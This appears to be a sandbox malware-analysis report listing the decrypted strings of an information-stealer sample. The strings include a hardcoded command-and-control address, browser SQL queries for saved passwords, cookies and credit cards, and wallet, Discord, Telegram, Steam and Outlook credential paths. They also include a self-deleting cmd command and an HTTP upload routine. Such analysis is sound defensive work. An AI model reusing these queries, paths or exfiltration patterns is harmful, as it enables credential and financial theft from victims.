Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.610000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 07
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 01
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 25
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.610000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.610000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.610000.0.unpack	String decryptor: drum
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.610000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.610000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.610000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.610000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.610000.0.unpack	String decryptor: history
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.610000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.610000.0.unpack	String decryptor: History
Source: 0.2.file.exe.610000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.610000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.610000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.610000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.610000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.610000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.610000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.610000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.610000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.610000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.610000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.610000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.610000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.610000.0.unpack	String decryptor: open
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.610000.0.unpack	String decryptor: files
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.610000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.610000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.610000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: done
Source: 0.2.file.exe.610000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.610000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: https
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.610000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.610000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.610000.0.unpack	String decryptor: build
Source: 0.2.file.exe.610000.0.unpack	String decryptor: token
Source: 0.2.file.exe.610000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.610000.0.unpack	String decryptor: file
Source: 0.2.file.exe.610000.0.unpack	String decryptor: message
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.610000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CB9A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB944C0 PK11_PubEncrypt,	0_2_6CB944C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB64420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CB64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB94440 PK11_PrivDecrypt,	0_2_6CB94440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CBE25B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CB7E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB78670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CB78670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CB9A650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CBBA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CBC0180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB943B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CB943B0
